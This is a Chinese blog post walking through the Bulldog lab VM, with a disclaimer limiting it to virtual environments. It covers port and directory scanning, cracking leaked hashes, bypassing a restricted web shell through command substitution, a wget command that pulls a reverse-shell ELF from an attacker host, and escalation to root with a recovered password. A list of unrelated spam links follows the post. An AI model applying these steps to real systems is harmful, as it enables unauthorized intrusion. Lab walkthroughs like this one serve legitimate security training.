当前位置: 首页 > news >正文

树立网站整体风格wordpress常用技巧

树立网站整体风格,wordpress常用技巧,大型网站建设的主要问题,html5开发工具有哪些声明 文中涉及操作均来自靶机虚拟环境,禁止用于真实环境,任何未经授权的渗透测试都是违法行为! 开搞 首先nmap扫描目标机开放端口和服务 访问80端口 扫目录撒 发现登录口 点击web-shell提示登录后才能使用 /dev/下面查看网页源码发现村咋h…

声明

文中涉及操作均来自靶机虚拟环境,禁止用于真实环境,任何未经授权的渗透测试都是违法行为!

开搞

首先nmap扫描目标机开放端口和服务

在这里插入图片描述

访问80端口

在这里插入图片描述

扫目录撒

在这里插入图片描述

发现登录口

在这里插入图片描述
在这里插入图片描述
点击web-shell提示登录后才能使用

在这里插入图片描述

/dev/下面查看网页源码发现村咋hash值

在这里插入图片描述

awk提取hash

把那堆复制到1.txt中提取
在这里插入图片描述

在线解密

https://crackstation.net/
在这里插入图片描述

nick/bulldog登录

在这里插入图片描述

进入web-shell

可以执行命令
在这里插入图片描述
但是很多命令不让用
在这里插入图片描述
可以用echo `curl` 的方法绕过限制
在这里插入图片描述

创建反弹shell

python起个服务

在这里插入图片描述

wget下载到目标

echo `wget http://192.168.2.129:5555/5555.elf`

在这里插入图片描述

msf建立监听

在这里插入图片描述

给5555.elf添加执行权限并执行

在这里插入图片描述

拿到shell

在这里插入图片描述

进入shell

在这里插入图片描述

查看家目录有啥

在这里插入图片描述

查看hiddenadmindirectory

查看note
在这里插入图片描述

密码藏在customPermissionApp

SUPERultimatePASSWORDyouCANTget
在这里插入图片描述

结束

因为这个文件是bulldogadmin的文件,我的身份是django,所以需要sudo 去给他加执行权限,sudo chmod 777 customPermissionApp就要用到django的密码
执行后变成了root权限
靶标一般就在root目录下
在这里插入图片描述

http://www.yayakq.cn/news/405168/

相关文章:

  • 怎么把网站模板上传到自己的网站网页美工设计培训学校哪家好
  • 做网站公司 晨旭东方对亚马逊网站做简要分析与评价
  • 个人网站页面模板html推广一个产品有哪些方式
  • 做资讯类网站需要什么资质网站赚钱平台
  • 做网站选什么配置电脑网站做数据监测
  • 多少钱做网站个性logo图案
  • 网站开发建设公司深圳网站建设公司公司
  • 营销型网站 平台网站开发验收确认书
  • 从化区建设网站wordpress首页404伪静态
  • 仿木鱼网络网站南通网站制作维护
  • 吉林省网站建设公司帮你省网站怎么做
  • 南宁市做公司网站南宁 建网站 公司
  • 网站模板文件扫描国外网站工作室
  • 北京软装设计公司有哪些企业网站优化平台
  • 祖庙高明网站建设c2c平台举例
  • 网站建设在医院的作用一页网站首页图如何做
  • 哪个网站可以做计算机二级的题旅游网站内容规划
  • 东莞设计网站建设优化大师下载安装
  • 自己用dw做网站能加声音吗注册会计师报考条件和时间2023
  • 网站改版计划比特币网站怎么做
  • 光大成贤建设有限公司网站网站建设的工作职责是什么
  • 网站设计 线框图 怎么画wordpress导出静态网站
  • 网站开通微信支付收费深圳的网站设计
  • 国内html网站欣赏建网站需花哪几种钱
  • 云南网站建设设计常州想做个企业的网站找谁做
  • 广州网站建设公司哪家比较好WordPress不显示斜杠
  • 建站之星至尊版杭州网站免费制作
  • 单页网站编辑器做.net网站流程
  • 哪个网站做学历认证ps海报素材网站
  • 青岛 网站维护网站建设和备案